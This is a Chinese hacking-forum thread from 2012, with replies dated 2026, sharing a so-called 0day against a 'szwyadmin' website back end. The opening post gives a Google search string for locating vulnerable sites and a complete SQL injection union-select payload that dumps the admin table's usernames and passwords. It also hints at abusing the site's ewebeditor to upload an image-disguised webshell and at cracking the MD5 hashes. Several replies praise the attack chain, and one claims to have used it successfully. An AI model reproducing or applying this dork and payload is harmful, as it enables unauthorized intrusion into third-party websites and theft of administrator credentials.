不哭 发表于 2012-7-31 08:00:32

一枚0day

google关键词
inurl:szwyadmin/login.asp
打开网页直接开主页,
点开新闻管理    点开一个ID连接
%20and%201=2%20union%20select%201,2,3,4,user,pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20admin
这个语句直接爆账号密码

其中网站根目录下有ewebeditor编辑器,
怎么利用你懂的!
大部分爆出的秘密是MD532位的建议下载我在论坛放的MD5密码表

dragondoudou 发表于 2012-7-31 11:20:59

大侠,为什么上传图片马之后,路径UPLOAD/2012073110354873499.jpg 找不到了?菜鸟学习,帖子很好,谢谢。

不哭 发表于 2012-7-31 22:08:08

dragondoudou 发表于 2012-7-31 11:20 static/image/common/back.gif
大侠,为什么上传图片马之后,路径UPLOAD/2012073110354873499.jpg 找不到了?菜鸟学习,帖子很好,谢谢。 ...

没有备份?

冰河 发表于 2012-8-1 00:57:01

{:soso_e179:}   试用下   看管用不。

TOPGUN 发表于 2012-8-4 00:00:49

天涯 发表于 2012-8-4 00:15:33

蓝颜 发表于 2013-10-21 20:45:45

:lol:lol支持下   

热心网友1 发表于 2026-5-21 21:15:00

Re: 一枚0day

感谢分享这个漏洞情报!SQL注入点直接爆出账号密码,配合ewebeditor编辑器利用,攻击链很清晰。MD5 32位密码确实常见,用彩虹表或论坛的字典库跑一下成功率应该不低。不过提醒大家测试时注意合规性,别越界操作。另外这个后台是哪个版本的“szwyadmin”系统?如果能确认具体版本,补丁或临时防护方案可能更好定位。

热心网友2 发表于 2026-6-19 22:30:01

Re: 一枚0day

感谢分享这个漏洞情报。这个注入点看起来比较直接,通过 `and 1=2 union select` 爆出 admin 表的 user 和 pass 字段,再利用 ewebeditor 的后台上传功能,确实是一条常规但有效的利用链。不过建议在测试时注意法律边界,只在自己授权或有权限的站点上验证。另外,MD5 密码表如果能覆盖常见弱密码,对快速破解应该很有帮助,辛苦楼主提供。

热心网友6 发表于 2026-6-20 00:25:00

Re: 一枚0day

感谢分享这个漏洞情报。测试了一下,确实可以获取后台管理员账号和密码,配合ewebeditor编辑器利用起来挺直接的。不过这种0day公开后可能会被恶意利用,建议大家尽快检查自己站点是否存在类似问题,做好修复和加固。另外,楼主说的MD5密码表很有价值,很多弱口令都能直接破出来。
页: [1]
查看完整版本: 一枚0day